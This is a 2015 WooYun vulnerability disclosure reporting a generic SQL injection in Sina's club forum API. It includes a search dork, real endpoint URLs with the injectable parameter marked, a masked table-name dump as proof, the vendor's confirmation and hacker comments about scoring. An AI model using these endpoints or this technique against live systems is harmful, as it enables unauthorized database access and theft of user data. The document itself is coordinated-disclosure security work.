当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115378

漏洞标题:新浪多站存在通用型SQL注入(涉及大量不同业务类型数据用户数据)

相关厂商:新浪

漏洞作者: 管管侠

提交时间:2015-05-21 17:26

修复时间:2015-08-20 10:20

公开时间:2015-08-20 10:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-21: 细节已通知厂商并且等待厂商处理中
2015-05-22: 厂商已经确认,细节仅向厂商公开
2015-05-25: 细节向第三方安全合作伙伴开放
2015-07-16: 细节向核心白帽子及相关领域专家公开
2015-07-26: 细节向普通白帽子公开
2015-08-05: 细节向实习白帽子公开
2015-08-20: 细节向公众公开

简要描述:

注入

详细说明:

百度:
site:sina.com.cn inurl:club

2.png


全部论坛都受影响,自己看每个论坛有多少会员吧,加起来数亿了吧
http://club.baby.sina.com.cn/api/api.php?s=suggest&a=user&q=1
http://club.mil.news.sina.com.cn/api/api.php?s=suggest&a=user&q=1
http://club.eladies.sina.com.cn/api/api.php?s=suggest&a=user&q=1
http://club.news.sina.com.cn/api/api.php?s=suggest&a=user&q=1
http://club.ent.sina.com.cn/api/api.php?s=suggest&a=user&q=1
http://club.astro.sina.com.cn/api/api.php?s=suggest&a=user&q=1
。。。。。。。还有好多

漏洞证明:

http://club.baby.sina.com.cn/api/api.php?s=suggest&a=user&q=1*

1.png


Database: clubbaby
[130 tables]

mask 区域 
*****------*****
*****diplog*****
*****s     *****
*****ities *****
*****ityapp*****
*****action*****
*****groups*****
*****notes *****
*****sessio*****
*****tiseme*****
*****ncemen*****
*****hments*****
*****hments*****
*****hpayme*****
*****htypes*****
*****roduct*****
*****log   *****
*****d     *****
*****es    *****
*****forums*****
*****s     *****
*****s     *****
*****igns  *****
*****r_queu*****
*****rlogs *****
*****tslog *****
*****      *****
*****eposts*****
*****es    *****
*****dlogin*****
*****      *****
*****ites  *****
*****fields*****
*****links *****
*****recomm*****
*****s     *****
*****types *****
*****es    *****
*****ool   *****
*****log   *****
*****market*****
*****s     *****
*****s     *****
*****rfield*****
*****rmagic*****
*****rs    *****
*****rspace*****
*****ators *****
*****g     *****
*****rks   *****
*****ts    *****
*****eads  *****
*****elist *****
*****etime *****
*****s     *****
*****ntlog *****
*****nhooks*****
*****ns    *****
*****nvars *****
*****      *****
*****rchind*****
*****ptions*****
*****      *****
*****xts   *****
*****ields_*****
*****ields_*****
*****ields_*****
*****ields_*****
*****ields_*****
*****ields_*****
*****ields_*****
*****ields_*****
*****ields_*****
*****ields_*****
*****      *****
*****_1    *****
*****_bak  *****
*****ctforu*****
*****cts   *****
*****lefiel*****
*****cts   *****
*****tions *****
*****      *****
*****      *****
*****og    *****
*****s     *****
*****edthre*****
*****tlog  *****
*****dlog  *****
*****ches  *****
*****h_queu*****
*****hindex*****
*****ons   *****
*****ngs   *****
*****es    *****
*****caches*****
*****      *****
*****ars   *****
*****s     *****
*****vars  *****
*****rums  *****
*****riptio*****
*****      *****
*****ates  *****
*****d_queu*****
*****ds    *****
*****dsmod *****
*****dtags *****
*****dtypes*****
*****commen*****
*****log   *****
*****option*****
*****s     *****
*****      *****
*****odels *****
*****ptions*****
*****ptionv*****
*****ars   *****
*****e     *****
*****ecache*****
*****roups *****
*****ating *****
*****s     *****
*****tags  *****
*****      *****
*****      *****
*****      *****
*****er    *****
*****      *****
*****      *****
*****er    *****
*****------*****


1.png


2.png


就不继续跑了,后补

修复方案:

版权声明:转载请注明来源 管管侠@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-05-22 10:18

厂商回复:

感谢关注新浪安全,漏洞修复中。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-05-21 18:59 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    这个案例貌似值20rank

  2. 2015-05-21 20:51 | scanf ( 核心白帽子 | Rank:1232 漏洞数:186 | 。)

    不会走通用流程吗?@浩天

  3. 2015-05-21 21:44 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    是sina内部通用的的,这种不走吧

  4. 2015-05-22 10:21 | 管管侠 ( 核心白帽子 | Rank:1368 漏洞数:108 | 休息几日,让你们先装会!!!)

    有SRC的厂商给分普遍都低,不客观

  5. 2015-05-22 10:26 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    你这貌似影响上亿用户吧

  6. 2015-05-22 10:42 | ca1n ( 普通白帽子 | Rank:100 漏洞数:22 | not yet)

    有SRC的厂商给分普遍都低,不客观

  7. 2015-05-26 10:13 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    再怎么上亿,他也就给这个

  8. 2015-05-26 15:35 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

    跟我没关系,不是我评的%>_<%

  9. 2015-05-26 15:41 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    @小川 你说来自首的?

  10. 2015-05-26 19:59 | phith0n 认证白帽子 ( 核心白帽子 | Rank:656 漏洞数:107 | 一个想当文人的黑客~)

    这个有点低,@小川 来自首了

  11. 2015-08-20 10:29 | XTT ( 实习白帽子 | Rank:32 漏洞数:8 | I am a new rookie)

    这个漏洞很NB,不过给分太低了吧~